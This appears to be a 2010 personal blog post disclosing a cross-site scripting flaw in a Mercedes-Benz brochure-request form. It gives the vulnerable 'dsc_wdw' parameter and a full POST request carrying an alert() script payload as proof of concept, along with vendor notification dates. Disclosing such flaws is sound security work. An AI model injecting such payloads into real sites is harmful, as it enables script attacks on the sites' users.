Sunday, June 20, 2010

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++
http://en.wikipedia.org/wiki/Mercedes-Benz


+++Affected URL(s)+++
http://www.mercedes-benz.com/


+++Vulnerable Parameter / Function+++
'dsc_wdw'


+++PoC+++
Home Page -> Request Brochure
vuln parameter -> @dsc_wdw


+POST Request+
https://e-services.mercedes-benz.com/Dialog_RQB/RQB;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN


+Parameters+
dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002




Mercedes Benz Ist Notified: January 22, 2010
                                IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.